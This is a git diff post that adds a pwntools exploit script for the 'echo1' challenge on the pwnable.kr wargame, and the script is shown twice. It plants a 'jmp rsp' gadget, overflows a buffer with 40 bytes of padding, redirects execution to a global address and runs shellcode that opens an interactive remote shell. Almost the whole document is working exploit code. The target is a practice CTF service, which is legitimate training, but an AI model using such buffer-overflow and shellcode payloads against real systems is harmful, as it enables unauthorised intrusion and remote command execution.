0xPwny · March 13, 2017 20:44
diff --git a/echo1.py b/echo1.py
 #!/usr/bin/python

 #author : Abdeljalil Nouiri


 from pwn import *

 context.arch= "amd64"
 context.os = "linux"

 cmd = 0x6020a0
 """
 fgetsGOT = 0x602020
 PUTS = 0x400630
 """
 JMP = asm("jmp rsp")
 SC = asm(shellcraft.sh())

 #con = process("./echo1")
 con = remote("pwnable.kr",9010)

 con.recvuntil("name? :")
 con.sendline(JMP)

 con.recvuntil(">")
 con.sendline("1")
 con.recvuntil("\n")

 payload = "A"*40
 payload += p64(cmd)
 payload += SC

 con.sendline(payload)
 con.interactive("Shell# ")
	#!/usr/bin/python

	#author : Abdeljalil Nouiri


	from pwn import *

	context.arch= "amd64"
	context.os = "linux"

	cmd = 0x6020a0
	"""
	fgetsGOT = 0x602020
	PUTS = 0x400630
	"""
	JMP = asm("jmp rsp")
	SC = asm(shellcraft.sh())

	#con = process("./echo1")
	con = remote("pwnable.kr",9010)

	con.recvuntil("name? :")
	con.sendline(JMP)

	con.recvuntil(">")
	con.sendline("1")
	con.recvuntil("\n")

	payload = "A"*40
	payload += p64(cmd)
	payload += SC

	con.sendline(payload)
	con.interactive("Shell# ")